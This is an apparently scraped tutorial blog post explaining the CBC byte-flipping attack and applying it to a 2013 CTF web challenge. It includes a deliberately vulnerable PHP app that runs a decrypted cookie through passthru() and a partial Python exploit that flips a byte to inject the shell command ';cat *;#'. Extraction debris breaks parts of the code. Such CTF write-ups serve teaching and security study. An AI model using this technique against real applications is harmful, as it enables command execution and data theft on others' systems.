Escolar Documentos
Profissional Documentos
Cultura Documentos
Ethical
Hacking Boot
Camp
OUR MOST POPULAR COURSE!
CLICK HERE!
What's this?
Practice for certification success with
the Skillset library of over 100,000
practice test questions. We analyze your
responses and can determine when you
are ready to sit for the test.
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD
As usual, there are some explanations about this attack out there (see references
at the end), but some knowledge is required to understand it properly, so here I
will describe, step by step, how to perform this attack.
Why?
Introduction
First of all, lets start understanding how CBC (cipher-block chaining) works. A
detailed explanation can be found here:
http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-
block_chaining_.28CBC.29
Encryption process
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD
IV: A block of bits that is used to randomize the encryption and hence to
produce distinct ciphertexts even if the same plaintext is encrypted multiple
times.
Key: Used by symmetric encryption algorithms like AES, Blowfish, DES, Triple
DES, etc.
An important point here is that CBC works on a fixed-length group of bits called
a block. In this blog, we will use blocks of 16 bytes each.
Note: As you can see, the ciphertext of the previous block is used to generate
the next one.
Decryption Process
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD
Note: The Ciphertext-N-1 is used to generate the plaintext of the next block; this
is where the byte flipping attack comes into play. If we change one byte of the
Ciphertext-N-1 then, by XORing with the net decrypted block, we will get a
different plaintext! You got it? Do not worry, we will see a detailed example
below. Meanwhile, below is a nice diagram explaining this attack:
Block 1: a:2:{s:4:name;
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD
Block 2 s:6:sdsdsd;s:8 <<<target data-blogger-escaped-div= data-
SIQ blogger-escaped-here=>
PHISHING SIMULATOR
Block 3: :greeting;s:20:
Block 4: echo Hello sd
Block 5: sdsd!';}
A rule of thumb is that the byte you change in a ciphertext will ONLY affect a
byte at the same offset of next plaintext. Our target is at offset 2:
[0] = s
[1] = :
[2] = 6
Therefore we need to change the byte at offset 2 of the first ciphertext block. As
you can see in the code below, at line 2 we get the ciphertext of the whole data,
then at line 3 we change the byte of block 1 at offset 2, and finally we call the
decryption function.
But, how did we change the byte to the value we wanted at line 3?
A = B XOR C
SIQ PHISHING SIMULATOR
And finally, A XOR B XOR C is equal to 0. With this formula, we can set our own
value by adding it at the end of the XOR calculation, like this:
A XOR B XOR C XOR 7 will give us 7 in the plaintext at offset 2 on the second
block.
Below is the PHP source code so that you can replicate it:
SIQ Exercise
PHISHING 2:
SIMULATOR
Now that we understood how this attack works, lets do a more real-world
exercise. Some weeks ago the CTF competition was hosted by the team
Eindbazen and there was a Web 400 challenge called Moo! You can see all the
details of this task at the end of the blog in References 2 and 3; here I am just
going to describe the final steps of breaking CBC.
We were provided with the source code for analysis. Below is the chunk
important for this exercise:
Basically, you will submit any text in the POST parameter name and the app
will respond with a Hello message concatenating the text submitted at the
end, but two things happen before the message is printed:
3. Finally, any time the page is accessed, if the cookie already exists, it will be
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD
decrypted and its content executed via passthru() function. Here is where our
SIQ CBC
PHISHING SIMULATOR
attack will give us a different plaintext, as explained in previous section.
So, I tried to inject the string below into the POST parameter name:
I added the char X which is the one to be replaced with a single quote via CBC
byte flipping attack, then the command to be executed, ;cat *;, and finally an #,
which is interpreted as a comment by the shell so that we do not get problems
with the last single quote inserted by escapeshellarg() function; therefore our
command gets executed successfully.
pos = 51;
val = chr(ord(X) ^ ord() ^ ord(cookie[pos]))
exploit = cookie[0:pos] + val + cookie[pos + 1:]
I am altering the cookie, since it has the whole ciphertext. Finally, I got this
result:
First, we can see in yellow that our X was successfully changed to a single
quote in the second block but, since the first block was altered, it got garbage
inserted (in green) which causes an error when trying to unserialize() the data (in
red) and, therefore, the app did not even try to execute our injection.
After sending above string, voila!!!, unserialize() does not complain about the
garbage received and our shell command is executed successfully!!!!
If you want to replicate this exercise, in the Appendix section there is the PHP
code running on the server side and the Python script (a little bit modified from
code provided by Daniel from hardc0de.ru, thanks!!!) to perform the exploit.
Finally, I want to thank the guys from the references mentioned below for
writing those excellent blogs.
Referencies
2. http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3. http://hardc0de.ru/2013/08/04/ebctf-web400/
Enjoy it!
Appendix
PHP code:
01. ini_set('display_errors',1);
02. error_reporting(E_ALL);
03.
54. \n";
55. echo "<input type="\"text\""
name="\"name\"" />\n";
56. echo "<input type="\"submit\""
name="\"submit\"" value="\"Submit\""
/>\n";
57. echo "</form>
58. <pre>
59. \n";
60. }
61. ?>
Exploit:
01. #!/usr/bin/python
02. import requests
03. import sys
04. import urllib
05. from base64 import b64decode as dec
06. from base64 import b64encode as enc
07.
50. #a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat
*;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello
zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";}
51. #a:2:{s:4:"name";
52. #s:42:"zzzzzzzzzz
53. #zzzzzzzX;cat *;#
54. #zzzzzzzzzzzzzzzz
55. #";s:8:"greeting"
56. #;s:56:"echo 'Hel
57. #lo zzzzzzzzzzzzz
}
61. #exploit = 'X' + ';cat *;#a' #Test case first, unsuccess
TOPICS 62. CONTRIBUTORS ARCHIVE
exploit = 'z'*17 CAREERS
+ 'X' + ';cat JOB #BOARD
*;#' + 'z' *16 Test Success
63.
SIQ PHISHING
64. SIMULATOR
#exploit =
"______________________________________________________; cat
*;#"
65. #Test(exploit)
66. cookie = GetCookie(exploit)
67. pos = 100; #test case success
68. #pos = 51; #test case first, unsuccess
69. val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos]))
70. exploit = cookie[0:pos] + val + cookie[pos + 1:]
71. Pwn(exploit)
SecurityIQ is the #1
Phishing Simulator
on the Market.
Try it today for FREE!
Phishing Simulator
Security Awareness
EDITORS CHOICE
An Introduction to tmux
USV CTF
Stapler Walkthrough
Unprotected MongoDB
Installations: childs play for
hackers
Information Security
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD
Security Awareness
SIQ PHISHING SIMULATOR
CCNA
PMP
Microsoft
Incident Response
Information Assurance
Ethical Hacking
Security
Awareness An Introduction to
Training for the tmux
European
0 Comments InfoSec Institute Resources Login
TOPICS CONTRIBUTORS ARCHIVE CAREERS JOB BOARD